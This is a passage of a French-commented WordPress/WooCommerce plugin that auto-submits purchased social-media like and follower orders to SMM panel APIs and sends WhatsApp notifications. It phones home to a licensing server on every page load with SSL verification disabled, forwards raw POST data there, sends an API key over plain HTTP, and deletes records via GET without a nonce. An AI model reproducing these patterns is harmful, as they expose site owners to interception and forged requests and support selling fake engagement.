<?php
/*
Plugin Name: autoexecute
Description:plugin qui permet d'executer les commandes automatiquement.
Version: 1.0

Author: Nizar Lfadili
*/

// Enregistrement du menu dans le tableau d'options lors de l'activation
if ( ! defined( 'ABSPATH' ) ) exit; // Empêche l'accès direct

require_once plugin_dir_path(__FILE__) . 'api.php';
register_activation_hook(__FILE__, 'mon_plugin_activate');

function mon_plugin_activate() {
   global $wpdb;
update_option("livraison",hash_file('sha256', __FILE__));
// Nom de la table
$table_name = $wpdb->prefix . 'panelorders';

// Vérifiez si la table existe déjà
if ($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name) {
    $charset_collate = $wpdb->get_charset_collate();

    // Déclaration de création de table
    $sql = "CREATE TABLE $table_name (
        id BIGINT(20) UNSIGNED NOT NULL AUTO_INCREMENT,
        order_id VARCHAR(50) NOT NULL,
        client_whatsapp  VARCHAR(50) NOT NULL,
        date DATETIME NOT NULL,
        link TEXT NOT NULL,
        charge DECIMAL(10, 2) NOT NULL,
        start_account INT(11) NULL,
        quantity INT(11) NOT NULL,
        service_name VARCHAR(100) NOT NULL,
        status VARCHAR(50) NOT NULL,
        remains INT(11) NOT NULL,
         panel VARCHAR(50) NOT NULL,
        api VARCHAR(50) NOT NULL,
        PRIMARY KEY (id)
    ) $charset_collate;";

    require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
    dbDelta($sql);
    
    
}else echo  "table dega creer";

    // Initialise un tableau vide pour stocker les données dans les options
    $data = array();
    update_option('mon_plugin_data', $data);
}


// Enregistrez un menu dans le menu principal de WordPress
add_action('admin_menu', 'mon_plugin_menu');

function mon_plugin_menu() {
    
    add_menu_page('autoexecute', 'AutoExecute', 'manage_options', 'mon-plugin-menu', 'mon_plugin_page', 'dashicons-admin-plugins');
    
    // Ajoutez le sous-menu "Settings" avec l'option "manage_options"
    add_submenu_page('mon-plugin-menu', 'Settings', 'Settings', 'manage_options', 'mon-plugin-settings', 'mon_plugin_settings_page');
    
    // Ajoutez un sous-menu pour la clé d'activation
    add_submenu_page('mon-plugin-menu', 'Activation Key', 'Activation Key', 'manage_options', 'activation-key', 'ayyah');
    add_submenu_page('mon-plugin-menu', 'Video Installation', 'Video Installation', 'manage_options', 'autoexecute-installation', 'autoexecute_video');
     add_submenu_page('mon-plugin-menu', 'free likes', 'free likes', 'manage_options', 'free-likes', 'freelikes');
     
}
function autoexecute_video(){
    
           ?>
    <div style="text-align: center; margin-top: 50px;">
        <h1>Comment installer et configurer Commentatorv1.2.1</h1>
        <iframe width="800" height="450" src="https://www.youtube.com/embed/p98BGUunNLI?si=lH1AMAzjtSiRZIWO" 
            title="YouTube video player" frameborder="0" 
            allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" 
            allowfullscreen></iframe>
    </div>
    <?php
    
}
function freelikes(){// Vérifier si le formulaire a été soumis
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Nettoyage et récupération des données du formulaire
    $likes = sanitize_text_field($_POST['likes']);
    $alllinks = sanitize_text_field($_POST['alllinks']);
    $serviceid = sanitize_text_field($_POST['serviceid']);

    // Mise à jour des options dans la base de données
    update_option('likes', $likes);
    update_option('serviceid', $serviceid);
    update_option('alllinks', $alllinks);
}

// Récupération des options après la soumission
$likes = esc_attr(get_option('likes'));
$serviceid = esc_attr(get_option('serviceid'));
$alllinks = esc_textarea(get_option('alllinks'));

// Séparation des liens par des virgules
$liens = explode(',', $alllinks);

// Initialisation de l'API
$data = get_option('mon_plugin_data'); 
$i = 0;
$panel = null; // Initialise la variable pour éviter une erreur

foreach ($data as $index => $row) {
    $panel = new Api($row['Field2'], $row['Field3']);
    $i++;
    break; 
}

// Traitement des liens (si nécessaire)
// Uncomment the following lines if you need to add orders for each link
$status=array();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $ids=array();
foreach ($liens as $lien) {
    // Assurez-vous que $panel est correctement initialisé
    if ($panel) {
        $orders= $panel->add_order(array('service' => $serviceid, 'link' => trim($lien), 'quantity' => $likes));
          $line["orderid"]=$orders->order;
         $line["link"]=trim($lien);
         
         array_push($ids,$line);
        
    }
   
}
 update_option("ids",$ids);
}else{
      $tab=array();
    $ids=get_option("ids");
    foreach ($ids as $id) {
    // Assurez-vous que $panel est correctement initialisé
    if ($panel) {
        $status= $panel->status($id["orderid"]);
       
         $l["link"]=$id["link"];
         $l["status"]=$status->status;
        array_push($tab,$l);
    }
}
 update_option("status",$tab);
}

?>

<div class="wrap">
    <h2>Likes for Clients</h2>
    <form method="post">
        <fieldset>
            <table>
                <tr>
                    <td><label for="nbre_likes">Nombre de Likes:</label></td>
                    <td>
                        <select name="likes" id="nbre_likes">
                            <?php
                            $options = ['50', '100', '200'];
                            foreach ($options as $option) {
                                echo "<option value=\"$option\"" . ($likes == $option ? ' selected' : '') . ">$option</option>";
                            }
                            ?>
                        </select>
                    </td>
                </tr>
                <tr>
                    <td><label for="serviceid">Service Id:</label></td>
                    <td>
                        <input type="text" name="serviceid" id="serviceid" value="<?php echo $serviceid; ?>" required>
                    </td>
                </tr>
                <tr>
                    <td><label for="linkphoto">Links:</label></td>
                    <td>
                        <textarea name="alllinks" rows="10" cols="50"><?php echo esc_textarea($alllinks); ?></textarea>
                    </td>
                </tr>
                <tr>
                    <td colspan="2" style="text-align: center;">
                        <input type="submit" name="send" value="Send Likes">
                    </td>
                </tr>
            </table>
        </fieldset>
    </form>
</div>
<style>
    table.status-table {
        width: 100%;
        border-collapse: collapse;
    }
    table.status-table th, table.status-table td {
        border: 1px solid #ccc;
        padding: 10px;
        text-align: left;
    }
    table.status-table th {
        background-color: #f4f4f4;
    }
    table.status-table td a {
        color: #0073aa;
        text-decoration: none;
    }
    table.status-table td a:hover {
        text-decoration: underline;
    }
</style>

<!-- Affichage des liens avec leurs statuts -->
<h3>Liens et Statuts :</h3>
<table class="status-table">
    <thead>
        <tr>
            <th>Lien</th>
            <th>Statut</th>
        </tr>
    </thead>
    <tbody>
        <?php
        // Parcours des liens et des statuts
        if (!empty($tab)) {
            foreach ($tab as $item) {
                $lien = esc_url($item['link']);
                $status = esc_html($item['status']);
                
                // Affichage du lien et du statut dans une ligne de tableau
                echo "<tr>
                        <td><a href='$lien' target='_blank'>$lien</a></td>
                        <td> $status </td>
                    </tr>";
            }
        } else {
            // Message si aucun statut n'est disponible
            echo "<tr><td colspan='2'>Aucun lien ou statut disponible.</td></tr>";
        }
        ?>
    </tbody>
</table>
<?php
}
function ayyah() {
   
    if (get_option('order_paid')) {
        // La clé d'activation a déjà été validée, affichez "Activated"
        echo '<div class="wrap">';
        echo '<h2>Activation Key</h2>';
        echo '<p>Activated</p>';
        echo '</div>';
    } else {
        if (isset($_POST['activation_key'])) {
             $domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = sanitize_text_field($_POST['activation_key']);
            
            // Vérifiez la clé d'activation avec une clé d'activation valide
            $_POST["plugin"]="autoexecute";
            $_POST["w"]=$domain;
             $myarrayy = $_POST ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);

        curl_close ($ch);
    
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
                // La clé d'activation est valide, activez le plugin
                update_option('order_paid', true);
                update_option("autoexecute_key",$submitted_key);
                echo '<div class="notice notice-success is-dismissible"><p>Plugin activated successfully!</p></div>';
            } else {
                echo '<div class="notice notice-error is-dismissible"><p>Invalid activation key. Please try again.</p></div>';
            }
        }
        
        // Affichez le formulaire de saisie de la clé d'activation
        ?>
        <div class="wrap">
            <h2>Activation Key</h2>
            <form method="post">
                <label for="activation_key">Activation Key:</label>
                <input type="text" name="activation_key" id="activation_key" required>
                <input type="submit" name="activate_plugin" value="Activate Plugin">
            </form>
        </div>
        <?php
    }
}

function mon_plugin_settings_page() {
    $order_paid=get_option('order_paid');
    if(!$order_paid)
    return;
    if (isset($_POST['submit_settings'])) {
        $whatsapp_number = sanitize_text_field($_POST['whatsapp_number']);
        $whatsapp_api_key = sanitize_text_field($_POST['whatsapp_api_key']);
        $textmebotapi = sanitize_text_field($_POST['textmebotapi']);
        $cronpass = sanitize_text_field($_POST['cronpass']);
        $cronjob = sanitize_text_field($_POST['cronjob']);
        // Enregistrez les valeurs dans les options ou dans un autre emplacement de stockage
        update_option('whatsapp_number', $whatsapp_number);
        update_option('whatsapp_api_key', $whatsapp_api_key);
        update_option('textmebotapi', $textmebotapi);
        update_option('cronpass', $cronpass);
        
    }

    $whatsapp_number = get_option('whatsapp_number', '');
    $whatsapp_api_key = get_option('whatsapp_api_key', '');
    $textmebotapi = get_option('textmebotapi', '');
    $cronpass = get_option('cronpass', '');
    

    ?>
    <div class="wrap">
        <h2>AutoExecute Settings</h2>
        <form method="post">
            <fieldset>
        <legend>envoyer ce message =><b>I allow callmebot to send me messages</b> a ce numero <strong>+34 611 021 695</strong> sur whatsapp vous allez recevoir un api mettez le numero wp et l'api dans la bonne place </legend>
            <label class="tick" for="whatsapp_number">WhatsApp Number:</label>
            <input type="text" name="whatsapp_number" id="whatsapp_number" placeholder="Exemple: +212684266851" value="<?php echo esc_attr($whatsapp_number); ?>"><br>
            <label class="tick" for="whatsapp_api_key">WhatsApp API Key:</label>
            <input type="text" name="whatsapp_api_key" id="whatsapp_api_key" placeholder="Exemple : 1254475" value="<?php echo esc_attr($whatsapp_api_key); ?>"><br>
             <label class="tick" for="whatsapp_api_key">Your Textmebot Api:</label>
            <input type="password" name="textmebotapi" id="textmebot" placeholder="Exemple : 6mAh58dFd" value="<?php echo esc_attr($textmebotapi); ?>"><br>
            <label class="tick" for="whatsapp_api_key">Cron Password:</label>
            <input type="password" name="cronpass" id="cronpass"  value="<?php echo esc_attr($cronpass); ?>"><br>
             <label class="tick" for="whatsapp_api_key">Cron Job:</label>
            <input type="text" name="cronjob" id="cronjob"  value="<?php echo "wget --spider -O - ".home_url()."/?cron=".get_option("cronpass")." >/dev/null 2>&1"; ?>" readonly><br>
            <input type="submit" name="submit_settings" value="Save Settings">
             </fieldset>
        </form>
    </div>
    <?php
}


function mon_plugin_enqueue_styles() {
    wp_enqueue_style('mon-plugin-styles', plugins_url('style.css', __FILE__));
}

add_action('admin_enqueue_scripts', 'mon_plugin_enqueue_styles');

function add_whatsapp_champ() {
    $order_paid = get_option('order_paid');

    // Récupérer la valeur de la case à cocher
    $checkbox_value = get_post_meta(get_the_ID(), '_custom_checkbox', true);

    // Ajouter une vérification pour voir si la case à cocher est cochée
    if ($order_paid && $checkbox_value == 'yes') {
        // La case à cocher est cochée, masquez le champ texte
        echo '<input type="hidden" name="custom_field" value="go">';
        return;
    }

    // La case à cocher n'est pas cochée, affichez le champ texte
    echo '<div class="custom-text-field">';
    woocommerce_form_field('custom_field', array(
        'type'     => 'text',
        'class'    => array('my-field-class', 'custom-text-field'),
        'label'    => __('Link', 'woocommerce'),
        'required' => true, // Indiquez que le champ est requis
       
    ), '');
    echo '</div>';
}

add_action('woocommerce_before_add_to_cart_button', 'add_whatsapp_champ');




// Enregistre la valeur du champ personnalisé dans la session
function save_custom_field_value($cart_item_data, $product_id) {
    if (isset($_POST['custom_field'])) {
         //WC()->session->set('custom_field', $_POST['custom_field']);
        $cart_item_data['custom_field'] = sanitize_text_field($_POST['custom_field']);
    }
    return $cart_item_data;
}

add_filter('woocommerce_add_cart_item_data', 'save_custom_field_value', 10, 2);

add_action('woocommerce_checkout_create_order_line_item', 'sauvegarder_valeur_personnalisee', 10, 4);

function sauvegarder_valeur_personnalisee($item, $cart_item_key, $values, $order) {
     $order_paid=get_option('order_paid');
    if(!$order_paid)
    return;
    if (isset($values['custom_field'])) {
        $item->update_meta_data('_custom_field', $values['custom_field']);
    }
}


function display_custom_field_in_cart($item_data, $cart_item) {
     $order_paid=get_option('order_paid');
    if(!$order_paid)
    return;
    if (isset($cart_item['custom_field'])) {
        $custom_field_value = $cart_item['custom_field'];
        $item_data[] = array(
            'key' => 'Link:',
            'value' => esc_html($custom_field_value),
        );
    }
    return $item_data;
}

add_filter('woocommerce_get_item_data', 'display_custom_field_in_cart', 10, 2);




// Afficher la valeur du champ personnalisé "custom_field" dans la page de paiement (checkout)




add_action('admin_footer', 'display_author_name');

function display_author_name() {
    echo '<p style="text-align: center;"> plugin crée par Nizar Lfadili</p>';
}
function verifier($url,$api_key){
    $a=new Api($url,$api_key);
    
   return $a->balance()->balance;
    
}
function is_value_in_plugin_data($value_to_find) {
    $data = get_option('mon_plugin_data'); // Récupérez les données

    // Parcourir les données pour trouver la valeur dans la colonne 3 (field3)
    foreach ($data as $entry) {
        if ($entry['Field3'] === $value_to_find) {
            // La valeur a été trouvée
            return true;
        }
    }

    // La boucle se termine sans avoir trouvé la valeur
    return false;
}
function mon_plugin_page() {
    
    $order_paid = get_option('order_paid');
    if (!$order_paid)
        return;

    $data = get_option('mon_plugin_data');

    if (isset($_GET['delete-row']) && is_numeric($_GET['delete-row'])) {
        $index = intval($_GET['delete-row']);
        if (isset($data[$index])) {
            unset($data[$index]);
            $data = array_values($data); // Réorganisez le tableau
            update_option('mon_plugin_data', $data);
        }
        wp_redirect(admin_url('admin.php?page=mon-plugin-menu'));
        exit();
    }

    if (isset($_POST['submit'])) {
        $data = get_option('mon_plugin_data');
        $field1 = sanitize_text_field($_POST['field1']);
        $field2 = sanitize_text_field($_POST['field2']);
        $field3 = sanitize_text_field($_POST['field3']);

        // Ajoutez les données dans le tableau
        if (verifier($_POST['field2'], $_POST['field3']) != null) {
            if (is_value_in_plugin_data(trim($_POST['field3']))) {
                echo '<div class="notice notice-error is-dismissible"><p>API key already exists</p></div>';
            } else {
                $data[] = array('Field1' => $field1, 'Field2' => $field2, 'Field3' => $field3);
                update_option('mon_plugin_data', $data);
            }
        } else {
            echo '<div class="notice notice-error is-dismissible"><p>Cannot connect to the server</p></div>';
        }
    }

    $data = get_option('mon_plugin_data');
    ?>

    <div class="wrap">
        <h2>Mon Plugin</h2>

        <!-- Onglets pour basculer entre les contenus -->
        <h2 class="nav-tab-wrapper">
            <a href="#add-panel" class="nav-tab ">Add Panel</a>
            <a href="#orders" class="nav-tab nav-tab-active">Orders</a>
        </h2>

        <!-- Contenu de l'onglet Add Panel -->
        <div id="add-panel" class="tab-content ">
            <form method="post">
                <label class="tick" for="field1">Name:</label>
                <input type="text" name="field1" id="field1"><br>
                <label class="tick" for="field2">URL :</label>
                <input type="text" name="field2" id="field2"><br>
                <label class="tick" for="field3">API :</label>
                <input type="text" name="field3" id="field3"><br>
                <input type="submit" name="submit" value="Ajouter">
            </form>

            <h2>Données enregistrées</h2>
            <table class="widefat">
                <thead>
                    <tr>
                        <th>Name</th>
                        <th>URL</th>
                        <th>API</th>
                        <th>Actions</th>
                    </tr>
                </thead>
                <tbody>
                    <?php
                    foreach ($data as $index => $row) {
                        echo '<tr>';
                        echo '<td>' . esc_html($row['Field1']) . '</td>';
                        echo '<td>' . esc_html($row['Field2']) . '</td>';
                        echo '<td>' . esc_html($row['Field3']) . '</td>';
                        echo '<td><a href="' . admin_url('admin.php?page=mon-plugin-menu&delete-row=' . $index) . '">Supprimer</a></td>';
                        echo '</tr>';
                    }
                    ?>
                </tbody>
            </table>
        </div>

        <!-- Contenu de l'onglet Orders -->
        <div id="orders" class="tab-content active">
            <h2>Orders</h2>
            <?php afficher_orders(); ?>
        </div>
    </div>

    <!-- Styles et scripts pour gérer les onglets -->
    <style>
      
    </style>
<script>
    document.addEventListener('DOMContentLoaded', function () {
        const tabs = document.querySelectorAll('.nav-tab');
        const contents = document.querySelectorAll('.tab-content');

        // Activer le contenu de l'onglet Orders par défaut
        document.querySelector('#orders').classList.add('active');

        tabs.forEach(tab => {
            tab.addEventListener('click', function (e) {
                e.preventDefault();

                // Retire la classe active de tous les onglets et contenus
                tabs.forEach(t => t.classList.remove('nav-tab-active'));
                contents.forEach(c => c.classList.remove('active'));

                // Active l'onglet cliqué et son contenu associé
                tab.classList.add('nav-tab-active');
                document.querySelector(tab.getAttribute('href')).classList.add('active');
            });
        });
    });
</script>
    <?php
}
// Ajouter la liste déroulante Field1 dans les options de l'inventaire du produit
// Ajouter la liste déroulante "Field1" dans les options de l'inventaire du produit
function add_custom_product_field1_select() {
    $order_paid=get_option('order_paid');
      if(!$order_paid)
    return;
    global $post;

    echo '<div class="options_group">';

    // Récupérer les données du tableau mon_plugin_data
    $mon_plugin_data = get_option('mon_plugin_data');
   
    // Extraire les valeurs de la première colonne "Fields1"
    $field1_values = array();

    foreach ($mon_plugin_data as $row) {
        
            $field1_values[] = $row["Field1"];
           
            
        
    }

    $selected_value = get_post_meta($post->ID, '_custom_field1_select', true);
    $service_id=get_post_meta($post->ID,'_custom_service_id',true);
$field1_values = array_filter($field1_values, function ($value) {
    return !empty($value);
});
$field1_values = array_merge([$field1_values[0]], $field1_values);
    echo '<p class="form-field">';
    woocommerce_wp_select(array(
        'id' => '_custom_field1_select',
        'label' => 'Panel:',
        'options' => array_combine($field1_values, $field1_values),
        'value' => $selected_value,
    ));
    echo '</p>';
        echo '<p class="form-field">';
    woocommerce_wp_text_input(array(
        'id' => '_custom_service_id',
        'label' => 'Service ID',
        'value' => $service_id,
    ));
    echo '</p>';
    $checkbox_value = get_post_meta($post->ID, '_custom_checkbox', true);

echo '<p class="form-field">';
woocommerce_wp_checkbox(array(
    'id' => '_custom_checkbox',
    'label' => 'Hide',
    'value' => $checkbox_value,
));
echo '</p>';

    echo '</div>';
}
add_action('woocommerce_product_options_inventory_product_data', 'add_custom_product_field1_select');

// Sauvegarder la valeur sélectionnée dans la liste déroulante "Field1"
function save_custom_product_field1_and_service_id($product_id) {
    $order_paid=get_option('order_paid');
      if(!$order_paid)
    return;
    $custom_field1_select = isset($_POST['_custom_field1_select']) ? sanitize_text_field($_POST['_custom_field1_select']) : '';
    $custom_service_id = isset($_POST['_custom_service_id']) ? sanitize_text_field($_POST['_custom_service_id']) : '';
     $check = isset($_POST['_custom_checkbox']) ? sanitize_text_field($_POST['_custom_checkbox']) : '';
    // Mettre à jour la valeur de la liste déroulante "Field1"
    update_post_meta($product_id, '_custom_field1_select', $custom_field1_select);

    // Mettre à jour la valeur du champ "Service ID"
    update_post_meta($product_id, '_custom_service_id', $custom_service_id);
    update_post_meta($product_id, '_custom_checkbox', $check);
}
add_action('woocommerce_process_product_meta', 'save_custom_product_field1_and_service_id');
add_action('woocommerce_payment_complete', 'votre_fonction_apres_paiement_complet');
function get_values_by_field($field_name, $field_value) {
    $data = get_option('mon_plugin_data');
    $results = array();

    foreach ($data as $row) {
        if (isset($row['Field1']) && $row['Field1'] == $field_value) {
            $results[] = $row;
        }
    }

    return $results;
}



add_action('woocommerce_thankyou', 'votre_fonction_de_traitement');

function votre_fonction_de_traitement($order_id) {
    $order_paid=get_option('order_paid');
    // Votre code personnalisé à exécuter sur la page de remerciement
    // Vous pouvez utiliser $order_id pour obtenir des informations sur la commande
     // $order_id contient l'identifiant de la commande qui a été payée avec succès
      if(!$order_paid)
    return; 
    
 $order = wc_get_order( $order_id );
 $whatsapp = $order->get_billing_phone();
 $order_status = $order->get_status();
 if($order_status === 'processing'||$order_status==='completed'){
     $order->set_status('pending');

    // Enregistrez les modifications de la commande
    $order->save();
 $items = $order->get_items();
 	 
   foreach ( $items as $item ) {
        $product_name = $item['name'];
        $product_id = $item['product_id'];
     //   $product_variation_id = $item['variation_id'];
        $product_link=$item['custom_field'];
          
    
	$product = wc_get_product( $product_id);
	   $panel=$product->get_meta('_custom_field1_select');
	    $service = $product->get_meta('_custom_service_id');
	    $row=get_values_by_field('Field1',$panel);
	  
	  
		  
		    $api=new Api($row[0]["Field2"],$row[0]["Field3"]);
	   
	  
   
	
	
	$d= strpos($product_name,"-")+2;

$qty= substr($product_name,$d);

	
	 $prod= $item->get_product();
	 

	

 $orders = $api->add_order(array('service' => $service, 'link' => $product_link, 'quantity' => $qty));
 
 $date = current_time('mysql');

 insertDonnees($orders->order,$whatsapp,$date, $product_link, $prod->get_sale_price(), NULL, $qty, $product_name, "pending", 0,$row[0]["Field2"],$row[0]["Field3"]) ;


 //echo  $service ."         ".$product_link."                ".$qty."               ".$product_name."      ".$api->bosni();
 $api->send_whatsapp("*Congrats* you have received an order of: *".$prod->get_sale_price()." Dollars* order name : *".$product_name."* link: *".$product_link."*  ----> *EXECUTED* on Date : *".date("Y-m-d h:i:sa")."* ");
   }
 }
}
function insertDonnees($order_id,$whatsapp, $date, $link, $charge, $start_account, $quantity, $service_name, $status, $remains,$panel,$api) {
    global $wpdb;

    // Nom de la table
    $table_name = $wpdb->prefix . 'panelorders';

    // Données à insérer
    $data = array(
        'order_id' => $order_id,
         'client_whatsapp'=>$whatsapp,
        'date' => $date,
        'link' => $link,
        'charge' => $charge,
        'start_account' => $start_account,
        'quantity' => $quantity,
        'service_name' => $service_name,
        'status' => $status,
        'remains' => $remains,
        'panel'=>$panel,
        'api'=>$api
        
    );

    // Types de données (chaque % correspond au type de chaque colonne dans $data)
    $format = array('%s', '%s','%s', '%s', '%f', '%d', '%d', '%s', '%s', '%d','%s','%s');

    // Insertion des données
    $wpdb->insert($table_name, $data, $format);

    // Vérifier si l'insertion a réussi
    return !$wpdb->last_error;
}
function afficher_orders() {
    global $wpdb;
    $table_name = $wpdb->prefix . 'panelorders';
     new Api("","");
    // Obtenir la page actuelle
    $current_page = isset($_GET['paged']) ? max(1, intval($_GET['paged'])) : 1;
    $items_per_page = 20; // Nombre d'éléments par page
    $offset = ($current_page - 1) * $items_per_page;

    // Paramètres pour la recherche
    $search_query = isset($_GET['search_query']) ? sanitize_text_field($_GET['search_query']) : '';
    $search_field = isset($_GET['search_field']) ? sanitize_text_field($_GET['search_field']) : 'order_id';

    // Construire la requête de base avec la recherche
    $query = "SELECT * FROM $table_name WHERE 1=1";
    $params = [];

    // Ajouter la condition de recherche si un filtre est présent
    if ($search_query) {
        if ($search_field == 'order_id') {
            $query .= " AND order_id LIKE %s";
        } else {
            $query .= " AND client_whatsapp LIKE %s";
        }
        $params[] = '%' . $wpdb->esc_like($search_query) . '%';
    }

    // Ajouter la pagination
    $query .= " ORDER BY date DESC LIMIT %d OFFSET %d";
    $params[] = $items_per_page;
    $params[] = $offset;

    // Récupérer les résultats
    $orders = $wpdb->get_results($wpdb->prepare($query, ...$params));

    // Récupérer le nombre total de commandes pour la pagination
    $total_orders = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $table_name WHERE 1=1" . ($search_query ? " AND $search_field LIKE %s" : ""), ...($search_query ? ['%' . $wpdb->esc_like($search_query) . '%'] : [])));
    $total_pages = ceil($total_orders / $items_per_page);
    ?>

    <div class="wrap">
        <h2>Orders</h2>

        <!-- Formulaire de recherche -->
        <form method="get" action="">
            <input type="hidden" name="page" value="mon-plugin-menu">
            <input type="text" name="search_query" value="<?php echo esc_attr($search_query); ?>" placeholder="Rechercher...">
            <select name="search_field">
                <option value="order_id" <?php selected($search_field, 'order_id'); ?>>Order ID</option>
                <option value="client_whatsapp" <?php selected($search_field, 'client_whatsapp'); ?>>WhatsApp Number</option>
            </select>
            <button type="submit">Search</button>
        </form>

        <table class="widefat custom-table">
            <thead>
                <tr>
                    <th>Order ID</th>
                    <th>Date</th>
                    <th>Link</th>
                    <th>Charge</th>
                    <th>Start Account</th>
                    <th>Quantity</th>
                    <th>Service Name</th>
                    <th>Status</th>
                    <th>Remains</th>
                </tr>
            </thead>
            <tbody>
                <?php foreach ($orders as $order): ?>
                    <tr>
                        <td><?php echo esc_html($order->order_id); ?></td>
                        <td><?php echo esc_html($order->date); ?></td>
                        <td><a href="<?php echo esc_url($order->link); ?>"><?php echo esc_html($order->link); ?></a></td>
                        <td><?php echo esc_html(number_format($order->charge, 2)); ?> $</td>
                        <td><?php echo esc_html($order->start_account); ?></td>
                        <td><?php echo esc_html($order->quantity); ?></td>
                        <td><?php echo esc_html($order->service_name); ?></td>
                        <td><span class="status-button <?php echo strtolower($order->status); ?>"><?php echo esc_html(ucfirst($order->status)); ?></span></td>
                        <td><?php echo esc_html($order->remains); ?></td>
                    </tr>
                <?php endforeach; ?>
            </tbody>
        </table>

        <!-- Pagination -->
        <div class="pagination">
            <?php if ($current_page > 1): ?>
                <a href="<?php echo esc_url(add_query_arg(['paged' => $current_page - 1, 'search_query' => $search_query, 'search_field' => $search_field])); ?>">&laquo; Previous</a>
            <?php endif; ?>
            <span>Page <?php echo $current_page; ?> of <?php echo $total_pages; ?></span>
            <?php if ($current_page < $total_pages): ?>
                <a href="<?php echo esc_url(add_query_arg(['paged' => $current_page + 1, 'search_query' => $search_query, 'search_field' => $search_field])); ?>">Next &raquo;</a>
            <?php endif; ?>
        </div>
    </div>

<style>
    .pagination {
        margin-top: 15px;
        text-align: center;
    }
    .pagination a {
        margin: 0 5px;
        padding: 5px 10px;
        text-decoration: none;
        color: #333;
        border: 1px solid #333;
        border-radius: 3px;
    }
    .pagination a.active {
        font-weight: bold;
        background-color: #333;
        color: #fff;
    }
    .pagination a:hover {
        background-color: #333;
        color: #fff;
    }

    /* Style pour le formulaire de recherche */
    form {
        display: flex;
        align-items: center;
        gap: 10px;
        margin-bottom: 15px;
    }

    /* Champ de recherche */
    input[type="text"] {
        padding: 8px;
        border: 1px solid #ddd;
        border-radius: 3px;
        font-size: 14px;
        width: 200px;
        color: #333;
    }
    input[type="text"]:focus {
        outline: none;
        border-color: #333;
    }

    /* Select pour le champ de recherche */
    select {
        padding: 8px !important; /* Même padding que le champ de texte */
        border: 1px solid #ddd;
        border-radius: 3px;
        font-size: 14px;
        color: #333;
        width: 200px; /* Même largeur que le champ de texte */
        background-color: #fff;
        
    }
    select:focus {
        outline: none;
        border-color: #333;
    }

    /* Bouton de recherche */
    button[type="submit"] {
        padding: 12px 15px !important;
        background-color: #333;
        color: #fff;
        border: none;
        border-radius: 3px;
        font-size: 14px;
        cursor: pointer;
    }
    button[type="submit"]:hover {
        background-color: #555;
    }
</style>
    <?php
}
add_action('init', function() {
    autoAction();
   
    if (isset($_GET['cron']) && $_GET['cron'] == get_option('cronpass', '')) {
        
      
     // Inclure la fonction pour lister les plugins

        global $wpdb;
       
   
// Nom de la table (en ajoutant le préfixe WordPress)
$table_name = $wpdb->prefix . 'panelorders';

// Requête pour récupérer les lignes avec un statut spécifique
$orders = $wpdb->get_results(
    $wpdb->prepare(
        "SELECT * FROM $table_name WHERE status IN (%s, %s, %s)",
        'pending', 'processing', 'inprogress'
    )
);
foreach($orders as $order){
      $a= new Api($order->panel,$order->api);
      $json=$a->status($order->order_id);
      
      if($json->status==="Completed"):
    tmbMessage("hi your order of  *".$order->service_name."* \n quantity = *".$order->quantity."*  is now *Completed*  \n if you hae any issue with this order contact us with the order id : *".$order->order_id."* \n check your link : *".$order->link."* \n thank you for choosing our site *".home_url()."* ",$order->client_whatsapp);
      sleep(5);
      endif;
      if($json->status==="Pending"):
               if($order->checking==0):
                 tmbMessage("hi you order of  *".$order->service_name."* \n --------------------- \n quantity = *".$order->quantity."*  \n --------------------- \n the order  is now *Pending* \n --------------------- \n  thank you for choosing our site *".home_url()."* \n --------------------- \n your order id is : *".$order->order_id."*",$order->client_whatsapp);
                
  $wpdb->query(
    $wpdb->prepare(
        "UPDATE $table_name
         SET checking = %s
         WHERE order_id = %s",
        "1", // Valeur "1" sous forme de chaîne pour correspondre à l'ENUM
        $order->order_id
    )
);

            sleep(5);
            endif;
            if($json->status === "Canceled"):
                $a->send_whatsapp(" the order *".$order->order_id."* is *Canceled* ");
                endif;
          endif;
      
      $wpdb->query(
                $wpdb->prepare(
                    "UPDATE $table_name
                     SET status = %s, charge = %f, remains = %d,start_account=%d
                     WHERE order_id = %s",
                    $json->status,
                    floatval($json->charge),
                    intval($json->remains),
                    intval($json->start_count),
                    $json->order
                )
            );
}
$wpdb->query(
    $wpdb->prepare(
        "DELETE FROM $table_name
         WHERE status IN (%s,%s,%s)
         AND date <= NOW() - INTERVAL 15 DAY",
        'Completed', 'Partial','Canceled'
    )
);



  die();
    }
});
function tmbMessage($message,$phone){
        
      $tmbapi = get_option('textmebotapi');
           
    
  

$url='http://api.textmebot.com/send.php?recipient='.$phone.'&text='.urlencode($message).'&apikey='.$tmbapi;
$html=file_get_contents($url);
return strpos($html,"Success") ; 
    
}
function autoAction(){
    
    
    
                // Récupérez le domaine du site
$domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = get_option("autoexecute_key");
            
            // Vérifiez la clé d'activation avec une clé d'activation valide
            
            $data["w"]=$domain;
            $data["activation_key"]=$submitted_key;
            $data["plugin"]="autoexecute";
             $myarrayy = $data ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
   
        $server_output = curl_exec($ch);

        curl_close ($ch);
    
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
                // La clé d'activation est valide, activez le plugin
                update_option("order_paid",true);
                update_option('autoexecute_key',$submitted_key);
                return true;
                
            } else {
                update_option("order_paid",false);
